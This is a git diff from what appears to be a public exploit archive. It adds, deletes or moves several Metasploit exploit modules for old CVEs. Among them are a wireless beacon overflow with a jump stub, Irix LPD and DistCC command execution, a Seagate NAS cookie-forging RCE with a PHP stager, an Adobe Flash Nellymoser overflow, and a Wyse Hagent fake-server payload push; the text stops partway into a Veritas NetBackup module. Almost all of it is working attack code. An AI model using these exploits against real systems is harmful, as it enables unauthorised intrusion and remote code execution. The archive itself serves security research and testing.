dst - blob[10,6] = src - blob[16,6] = src # bssid field, good idea to set to src. - blob[22,2] = seq - - blob - end - - def create_frame - "\x80" + # type/subtype - "\x00" + # flags - "\x00\x00" + # duration - eton(datastore['ADDR_DST']) + # dst - "\x58\x58\x58\x58\x58\x58" + # src - "\x58\x58\x58\x58\x58\x58" + # bssid - "\x70\xed" + # sequence number - - # - # fixed parameters - # - - # timestamp value - rand_text_alphanumeric(8) + - "\x64\x00" + # beacon interval - "\x11\x04" + # capability flags - - # - # tagged parameters - # - - # ssid tag - "\x00" + # tag: SSID parameter set - "\x5d" + # len: length is 93 bytes - - # jump into the payload - "\x89\xf9" + # mov edi, ecx - "\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b - "\xff\xe1" + # jmp ecx - - # padding - rand_text_alphanumeric(79) + - - # return address - [target.ret].pack('V') + - - # vendor specific tag - "\xdd" + # wpa - "\xff" + # big as we can make it - - # the kernel-mode stager - payload.encoded - end - -end diff --git a/platforms/irix/remote/10033.rb b/platforms/irix/remote/10033.rb index c363a1824..307247d06 100755 --- a/platforms/irix/remote/10033.rb +++ b/platforms/irix/remote/10033.rb @@ -1,32 +1,31 @@ ## -# $Id$ +# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Irix LPD tagprinter Command Execution', 'Description' => %q{ - This module exploits an arbitrary command execution flaw in - the in.lpd service shipped with all versions of Irix. + This module exploits an arbitrary command execution flaw in + the in.lpd service shipped with all versions of Irix. }, 'Author' => [ 'optyx', 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', + 'Version' => '$Revision: 10561 $', 'References' => [ ['CVE', '2001-0800'], @@ -45,18 +44,18 @@ class Metasploit3 < Msf::Exploit::Remote 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet', } - }, - 'Targets' => + }, + 'Targets' => [ [ 'Automatic Target', { }] ], 'DisclosureDate' => 'Sep 01 2001', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(515) - ], self.class) + + register_options( + [ + Opt::RPORT(515) + ], self.class) end def check @@ -64,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("T;uname -a;\n") resp = sock.get_once disconnect - + if (resp =~ /IRIX/) print_status("Response: #{resp.strip}") return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect sock.put("T;#{payload.encoded};\n") diff --git a/platforms/irix/remote/16877.rb b/platforms/irix/remote/16877.rb deleted file mode 100755 index 307247d06..000000000 --- a/platforms/irix/remote/16877.rb +++ /dev/null @@ -1,81 +0,0 @@ -## -# $Id: tagprinter_exec.rb 10561 2010-10-06 00:53:45Z hdm $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Irix LPD tagprinter Command Execution', - 'Description' => %q{ - This module exploits an arbitrary command execution flaw in - the in.lpd service shipped with all versions of Irix. - }, - 'Author' => [ 'optyx', 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 10561 $', - 'References' => - [ - ['CVE', '2001-0800'], - ['OSVDB', '8573'], - ['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'], - ], - 'Privileged' => false, - 'Platform' => ['unix', 'irix'], - 'Arch' => ARCH_CMD, - 'Payload' => - { - 'Space' => 512, - 'DisableNops' => true, - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic telnet', - } - }, - 'Targets' => - [ - [ 'Automatic Target', { }] - ], - 'DisclosureDate' => 'Sep 01 2001', - 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(515) - ], self.class) - end - - def check - connect - sock.put("T;uname -a;\n") - resp = sock.get_once - disconnect - - if (resp =~ /IRIX/) - print_status("Response: #{resp.strip}") - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe - end - - def exploit - connect - sock.put("T;#{payload.encoded};\n") - handler - print_status("Payload: #{payload.encoded}") - end - -end diff --git a/platforms/linux/local/36388.py b/platforms/linux/dos/36388.py similarity index 100% rename from platforms/linux/local/36388.py rename to platforms/linux/dos/36388.py diff --git a/platforms/linux/remote/16919.rb b/platforms/linux/remote/16919.rb deleted file mode 100755 index 2e53a035d..000000000 --- a/platforms/linux/remote/16919.rb +++ /dev/null @@ -1,132 +0,0 @@ -## -# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - - -require 'msf/core' - - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'DistCC Daemon Command Execution', - 'Description' => %q{ - This module uses a documented security weakness to execute - arbitrary commands on any system running distccd. - - }, - 'Author' => [ 'hdm' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 9669 $', - 'References' => - [ - [ 'CVE', '2004-2687'], - [ 'OSVDB', '13378' ], - [ 'URL', 'http://distcc.samba.org/security.html'], - - ], - 'Platform' => ['unix'], - 'Arch' => ARCH_CMD, - 'Privileged' => false, - 'Payload' => - { - 'Space' => 1024, - 'DisableNops' => true, - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic perl ruby bash telnet', - } - }, - 'Targets' => - [ - [ 'Automatic Target', { }] - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Feb 01 2002' - )) - - register_options( - [ - Opt::RPORT(3632) - ], self.class) - end - - def exploit - connect - - distcmd = dist_cmd("sh", "-c", payload.encoded); - sock.put(distcmd) - - dtag = rand_text_alphanumeric(10) - sock.put("DOTI0000000A#{dtag}\n") - - res = sock.get_once(24, 5) - - if !(res and res.length == 24) - print_status("The remote distccd did not reply to our request") - disconnect - return - end - - # Check STDERR - res = sock.get_once(4, 5) - res = sock.get_once(8, 5) - len = [res].pack("H*").unpack("N")[0] - - return if not len - if (len > 0) - res = sock.get_once(len, 5) - res.split("\n").each do |line| - print_status("stderr: #{line}") - end - end - - # Check STDOUT - res = sock.get_once(4, 5) - res = sock.get_once(8, 5) - len = [res].pack("H*").unpack("N")[0] - - return if not len - if (len > 0) - res = sock.get_once(len, 5) - res.split("\n").each do |line| - print_status("stdout: #{line}") - end - end - - handler - disconnect - end - - - # Generate a distccd command - def dist_cmd(*args) - - # Convince distccd that this is a compile - args.concat(%w{# -c main.c -o main.o}) - - # Set distcc 'magic fairy dust' and argument count - res = "DIST00000001" + sprintf("ARGC%.8x", args.length) - - # Set the command arguments - args.each do |arg| - res << sprintf("ARGV%.8x%s", arg.length, arg) - end - - return res - end - -end - diff --git a/platforms/linux/webapps/41678.rb b/platforms/linux/webapps/41678.rb deleted file mode 100755 index 3ee4f5532..000000000 --- a/platforms/linux/webapps/41678.rb +++ /dev/null @@ -1,353 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'rexml/document' - -class MetasploitModule < Msf::Exploit::Remote - Rank = NormalRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Seagate Business NAS Unauthenticated Remote Command Execution', - 'Description' => %q{ - Some Seagate Business NAS devices are vulnerable to command execution via a local - file include vulnerability hidden in the language parameter of the CodeIgniter - session cookie. The vulnerability manifests in the way the language files are - included in the code on the login page, and hence is open to attack from users - without the need for authentication. The cookie can be easily decrypted using a - known static encryption key and re-encrypted once the PHP object string has been - modified. - This module has been tested on the STBN300 device. - }, - 'Author' => [ - 'OJ Reeves ' # Discovery and Metasploit module - ], - 'References' => [ - ['CVE', '2014-8684'], - ['CVE', '2014-8686'], - ['CVE', '2014-8687'], - ['EDB', '36202'], - ['URL', 'http://www.seagate.com/au/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/'], - ['URL', 'https://beyondbinary.io/advisory/seagate-nas-rce/'] - ], - 'DisclosureDate' => 'Mar 01 2015', - 'Privileged' => true, - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Payload' => {'DisableNops' => true}, - 'Targets' => [['Automatic', {}]], - 'DefaultTarget' => 0, - 'License' => MSF_LICENSE - )) - - register_options([ - OptString.new('TARGETURI', [true, 'Path to the application root', '/']), - OptString.new('ADMINACCOUNT', [true, 'Name of the NAS admin account', 'admin']), - OptString.new('COOKIEID', [true, 'ID of the CodeIgniter session cookie', 'ci_session']), - OptString.new('XORKEY', [true, 'XOR Key used for the CodeIgniter session', '0f0a000d02011f0248000d290d0b0b0e03010e07']) - ]) - end - - # - # Write a string value to a serialized PHP object without deserializing it first. - # If the value exists it will be updated. - # - def set_string(php_object, name, value) - prefix = "s:#{name.length}:\"#{name}\";s:" - if php_object.include?(prefix) - # the value already exists in the php blob, so update it. - return php_object.gsub("#{prefix}\\d+:\"[^\"]*\"", "#{prefix}#{value.length}:\"#{value}\"") - end - - # the value doesn't exist in the php blob, so create it. - count = php_object.split(':')[1].to_i + 1 - php_object.gsub(/a:\d+(.*)}$/, "a:#{count}\\1#{prefix}#{value.length}:\"#{value}\";}") - end - - # - # Findez ze holez! - # - def check - begin - res = send_request_cgi( - 'uri' => normalize_uri(target_uri), - 'method' => 'GET', - 'headers' => { - 'Accept' => 'text/html' - } - ) - - if res && res.code == 200 - headers = res.to_s - - # validate headers - if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28') - # and make sure that the body contains the title we'd expect - if res.body.include?('Login to BlackArmor') - return Exploit::CheckCode::Appears - end - end - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - # something went wrong, assume safe. - end - - Exploit::CheckCode::Safe - end - - # - # Executez ze sploitz! - # - def exploit - - # Step 1 - Establish a session with the target which will give us a PHP object we can - # work with. - begin - print_status("Establishing session with target ...") - res = send_request_cgi({ - 'uri' => normalize_uri(target_uri), - 'method' => 'GET', - 'headers' => { - 'Accept' => 'text/html' - } - }) - - if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/ - cookie_value = $1.strip - else - fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.") - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") - end - - # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly - # then update it so that it's an admin session before re-encrypting - print_status("Upgrading session to administrator ...") - php_object = decode_cookie(cookie_value) - vprint_status("PHP Object: #{php_object}") - - admin_php_object = set_string(php_object, 'is_admin', 'yes') - admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("Admin PHP object: #{admin_php_object}") - - admin_cookie_value = encode_cookie(admin_php_object) - - # Step 3 - Extract the current host configuration so that we don't lose it. - host_config = nil - - # This time value needs to be consistent across calls - config_time = ::Time.now.to_i - - begin - print_status("Extracting existing host configuration ...") - res = send_request_cgi( - 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), - 'method' => 'GET', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", - 'vars_get' => { - '_' => config_time - } - ) - - if res && res.code == 200 - res.body.split("\r\n").each do |l| - if l.include?('general_setup') - host_config = l - break - end - end - else - fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.") - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") - end - - print_good("Host configuration extracted.") - vprint_status("Host configuration: #{host_config}") - - # Step 4 - replace the host device description with a custom payload that can - # be used for LFI. We have to keep the payload small because of size limitations - # and we can't put anything in with '$' in it. So we need to make a simple install - # payload which will write a required payload to disk that can be executes directly - # as the last part of the payload. This will also be self-deleting. - param_id = rand_text_alphanumeric(3) - - # There are no files on the target file system that start with an underscore - # so to allow for a small file size that doesn't collide with an existing file - # we'll just prefix it with an underscore. - payload_file = "_#{rand_text_alphanumeric(3)}.php" - - installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" - stager = Rex::Text.encode_base64(installer) - stager = xml_encode("") - vprint_status("Stager: #{stager}") - - # Butcher the XML directly rather than attempting to use REXML. The target XML - # parser is way to simple/flaky to deal with the proper stuff that REXML - # spits out. - desc_start = host_config.index('" description="') + 15 - desc_end = host_config.index('"', desc_start) - xml_payload = host_config[0, desc_start] + - stager + host_config[desc_end, host_config.length] - vprint_status(xml_payload) - - # Step 5 - set the host description to the stager so that it is written to disk - print_status("Uploading stager ...") - begin - res = send_request_cgi( - 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), - 'method' => 'POST', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", - 'vars_get' => { - '_' => config_time - }, - 'vars_post' => { - 'general_setup' => xml_payload - } - ) - - unless res && res.code == 200 - fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).") - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") - end - - print_good("Stager uploaded.") - - # Step 6 - Invoke the stage, passing in a self-deleting php script body. - print_status("Executing stager ...") - payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") - payload_cookie_value = encode_cookie(payload_php_object) - self_deleting_payload = "" - errored = false - - begin - res = send_request_cgi( - 'uri' => normalize_uri(target_uri), - 'method' => 'POST', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}", - 'vars_post' => { - param_id => Rex::Text.encode_base64(self_deleting_payload) - } - ) - - if res && res.code == 200 - print_good("Stager execution succeeded, payload ready for execution.") - else - print_error("Stager execution failed (invalid result).") - errored = true - end - rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("Stager execution failed (unable to establish connection).") - errored = true - end - - # Step 7 - try to restore the previous configuration, allowing exceptions - # to bubble up given that we're at the end. This step is important because - # we don't want to leave a trail of junk on disk at the end. - print_status("Restoring host config ...") - res = send_request_cgi( - 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), - 'method' => 'POST', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{admin_cookie_value}", - 'vars_get' => { - '_' => config_time - }, - 'vars_post' => { - 'general_setup' => host_config - } - ) - - # Step 8 - invoke the installed payload, but only if all went to plan. - unless errored - print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") - res = send_request_cgi( - 'uri' => normalize_uri(target_uri, payload_file), - 'method' => 'GET', - 'headers' => { - 'Accept' => 'text/html' - }, - 'cookie' => "#{datastore['COOKIEID']}=#{payload_cookie_value}" - ) - end - end - - # - # Take a CodeIgnitor cookie and pull out the PHP object using the XOR - # key that we've been given. - # - def decode_cookie(cookie_content) - cookie_value = Rex::Text.decode_base64(URI.decode(cookie_content)) - pass = xor(cookie_value, datastore['XORKEY']) - result = '' - - (0...pass.length).step(2).each do |i| - result << (pass[i].ord ^ pass[i + 1].ord).chr - end - - result - end - - # - # Take a serialised PHP object cookie value and encode it so that - # CodeIgniter thinks it's legit. - # - def encode_cookie(cookie_value) - rand = Rex::Text.sha1(rand_text_alphanumeric(40)) - - block = '' - - (0...cookie_value.length).each do |i| - block << rand[i % rand.length] - block << (rand[i % rand.length].ord ^ cookie_value[i].ord).chr - end - - cookie_value = xor(block, datastore['XORKEY']) - cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("Cookie value: #{cookie_value}") - - cookie_value - end - - # - # XOR a value against a key. The key is cycled. - # - def xor(string, key) - result = '' - - string.bytes.zip(key.bytes.cycle).each do |s, k| - result << (s ^ k) - end - - result - end - - # - # Simple XML substitution because the target XML handler isn't really - # full blown or smart. - # - def xml_encode(str) - str.gsub(//, '>') - end - -end \ No newline at end of file diff --git a/platforms/multiple/local/41682.rb b/platforms/multiple/local/30474.rb similarity index 100% rename from platforms/multiple/local/41682.rb rename to platforms/multiple/local/30474.rb diff --git a/platforms/multiple/local/41681.rb b/platforms/multiple/local/41681.rb deleted file mode 100755 index 169e8db11..000000000 --- a/platforms/multiple/local/41681.rb +++ /dev/null @@ -1,191 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class MetasploitModule < Msf::Exploit::Remote - Rank = GreatRanking - - include Msf::Exploit::Remote::BrowserExploitServer - - def initialize(info={}) - super(update_info(info, - 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow', - 'Description' => %q{ - This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser - encoded audio inside a FLV video, as exploited in the wild on June 2015. This module - has been tested successfully on: - Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, - Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, - Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, - Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and - Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. - Note that this exploit is effective against both CVE-2015-3113 and the - earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression - to the same root cause as CVE-2015-3043. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Unknown', # Exploit in the wild - 'juan vazquez' # msf module - ], - 'References' => - [ - ['CVE', '2015-3043'], - ['CVE', '2015-3113'], - ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], - ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'], - ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'], - ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'], - ['URL', 'http://bobao.360.cn/learning/detail/357.html'] - ], - 'Payload' => - { - 'DisableNops' => true - }, - 'Platform' => ['win', 'linux'], - 'Arch' => [ARCH_X86], - 'BrowserRequirements' => - { - :source => /script|headers/i, - :arch => ARCH_X86, - :os_name => lambda do |os| - os =~ OperatingSystems::Match::LINUX || - os =~ OperatingSystems::Match::WINDOWS_7 || - os =~ OperatingSystems::Match::WINDOWS_81 - end, - :ua_name => lambda do |ua| - case target.name - when 'Windows' - return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF - when 'Linux' - return true if ua == Msf::HttpClients::FF - end - - false - end, - :flash => lambda do |ver| - case target.name - when 'Windows' - return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161') - return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169') - when 'Linux' - return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457') - end - - false - end - }, - 'Targets' => - [ - [ 'Windows', - { - 'Platform' => 'win' - } - ], - [ 'Linux', - { - 'Platform' => 'linux' - } - ] - ], - 'Privileged' => false, - 'DisclosureDate' => 'Jun 23 2015', - 'DefaultTarget' => 0)) - end - - def exploit - @swf = create_swf - @flv = create_flv - - super - end - - def on_request_exploit(cli, request, target_info) - print_status("Request: #{request.uri}") - - if request.uri =~ /\.swf$/ - print_status('Sending SWF...') - send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) - return - end - - if request.uri =~ /\.flv$/ - print_status('Sending FLV...') - send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) - return - end - - print_status('Sending HTML...') - send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) - end - - def exploit_template(cli, target_info) - swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" - target_payload = get_payload(cli, target_info) - b64_payload = Rex::Text.encode_base64(target_payload) - os_name = target_info[:os_name] - - if target.name =~ /Windows/ - platform_id = 'win' - elsif target.name =~ /Linux/ - platform_id = 'linux' - end - - html_template = %Q| - - - - - - - - - - - | - - return html_template, binding() - end - - def create_swf - path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf') - swf = ::File.open(path, 'rb') { |f| swf = f.read } - - swf - end - - def create_flv - header = '' - header << 'FLV' # signature - header << [1].pack('C') # version - header << [4].pack('C') # Flags: TypeFlagsAudio - header << [9].pack('N') # DataOffset - - data = '' - data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0 - data << "\xee" * 0x440 # SoundData - - tag1 = '' - tag1 << [8].pack('C') # TagType (audio) - tag1 << "\x00\x04\x41" # DataSize - tag1 << "\x00\x00\x1a" # TimeStamp - tag1 << [0].pack('C') # TimeStampExtended - tag1 << "\x00\x00\x00" # StreamID, always 0 - tag1 << data - - body = '' - body << [0].pack('N') # PreviousTagSize - body << tag1 - body << [0xeeeeeeee].pack('N') # PreviousTagSize - - flv = '' - flv << header - flv << body - - flv - end -end \ No newline at end of file diff --git a/platforms/multiple/remote/16287.rb b/platforms/multiple/remote/16287.rb deleted file mode 100755 index e3ba4258c..000000000 --- a/platforms/multiple/remote/16287.rb +++ /dev/null @@ -1,251 +0,0 @@ -## -# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'timeout' -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::FtpServer - include Msf::Exploit::EXE - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution', - 'Description' => %q{ - This module exploits the Wyse Rapport Hagent service by pretending to - be a legitimate server. This process involves starting both HTTP and - FTP services on the attacker side, then contacting the Hagent service of - the target and indicating that an update is available. The target will - then download the payload wrapped in an executable from the FTP service. - }, - 'Stance' => Msf::Exploit::Stance::Aggressive, - 'Author' => 'kf', - 'Version' => '$Revision: 10998 $', - 'References' => - [ - ['CVE', '2009-0695'], - ['OSVDB', '55839'], - ['US-CERT-VU', '654545'], - ['URL', 'http://snosoft.blogspot.com/'], - ['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'], - ['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'], - ['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'], - ], - 'Privileged' => true, - 'Payload' => - { - 'Space' => 2048, - 'BadChars' => '', - }, - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Targets' => - [ - [ 'Windows XPe x86',{'Platform' => 'win',}], - [ 'Wyse Linux x86', {'Platform' => 'linux',}], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jul 10 2009' - )) - - register_options( - [ - OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]), - Opt::RPORT(80), - ], self.class) - end - - - def exploit - - if(datastore['SRVPORT'].to_i != 21) - print_error("This exploit requires the FTP service to run on port 21") - return - end - - # Connect to the target service - print_status("Connecting to the target") - connect() - - # Start the FTP service - print_status("Starting the FTP server") - start_service() - - # Create the executable with our payload - print_status("Generating the EXE") - @exe_file = generate_payload_exe - if target['Platform'] == 'win' - maldir = "C:\\" # Windows - malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe" - co = "XP" - elsif target['Platform'] == 'linux' - maldir = "//tmp//" # Linux - malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin" - co = "LXS" - end - @exe_sent = false - - # Start the HTTP service - print_status("Starting the HTTP service") - wdmserver = Rex::Socket::TcpServer.create({ - 'Context' => { - 'Msf' => framework, - 'MsfExploit' => self - } - }) - - # Let this close automatically - add_socket(wdmserver) - - wdmserver_port = wdmserver.getsockname[2] - print_status("Starting the HTTP service on port #{wdmserver_port}") - - - fakerapport = Rex::Socket.source_address(rhost) - fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0] - mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|" - - # FTP Credentials - ftpserver = Rex::Socket.source_address(rhost) - ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1) - ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1) - ftpport = 21 - ftpsecure = '0' - - incr = 10 - pwn1 = - "&UP0|&SI=1|UR=9" + - "|CO \x0f#{co}\x0f|#{incr}" + - # "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" + - "|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}" - - pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}" - - pwn3 = - "|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # "|RB|#{incr+1}" + - # "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" + - #"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" + - # FTP Paramaters - "|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + - "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" + - "|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + - "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" + - # No clue - "|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|" - - if target['Platform'] == 'win' - pwn = pwn1 + pwn3 - elsif target['Platform'] == 'linux' - pwn = pwn1 + pwn2 + pwn3 - end - # Send the malicious request - sock.put(mal) - - # Download some response data - resp = sock.get_once(-1, 10) - print_status("Received: #{resp}") - - if not resp - print_error("No reply from the target, this may not be a vulnerable system") - return - end - - print_status("Waiting on a connection to the HTTP service") - begin - Timeout.timeout(190) do - done = false - while (not done and session = wdmserver.accept) - req = session.recvfrom(2000)[0] - next if not req - next if req.empty? - print_status("HTTP Request: #{req.split("\n")[0].strip}") - - case req - when /V01/ - print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)") - res = pwn - when /V02/ - print_status("++ device sending V02 query...") - res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|" - done = true - - when /V55/ - print_status("++ device sending V55 query...") - res = pwn - when /POST/ # PUT is used for non encrypted requests. - print_status("++ device sending V55 query...") - res = pwn - done = true - else - print_status("+++ sending generic response...") - res = pwn - end - - print_status("Sending reply: #{res}") - session.put(res) - session.close - end - end - rescue ::Timeout::Error - print_status("Timed out waiting on the HTTP request") - wdmserver.close - disconnect() - stop_service() - return - end - - print_status("Waiting on the FTP request...") - stime = Time.now.to_f - while(not @exe_sent) - break if (stime + 90 < Time.now.to_f) - select(nil, nil, nil, 0.25) - end - - if(not @exe_sent) - print_status("No executable sent :(") - end - - stop_service() - wdmserver.close() - - handler - disconnect - end - - def on_client_command_retr(c,arg) - print_status("#{@state[c][:name]} FTP download request for #{arg}") - conn = establish_data_connection(c) - if(not conn) - c.put("425 Can't build data connection\r\n") - return - end - - c.put("150 Opening BINARY mode data connection for #{arg}\r\n") - conn.put(@exe_file) - c.put("226 Transfer complete.\r\n") - conn.close - @exe_sent = true - end - - def on_client_command_size(c,arg) - print_status("#{@state[c][:name]} FTP size request for #{arg}") - c.put("213 #{@exe_file.length}\r\n") - end - - -end - diff --git a/platforms/multiple/remote/16290.rb b/platforms/multiple/remote/16290.rb deleted file mode 100755 index 820f93a2a..000000000 --- a/platforms/multiple/remote/16290.rb +++ /dev/null @@ -1,97 +0,0 @@ -## -# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'VERITAS NetBackup Remote Command Execution', - 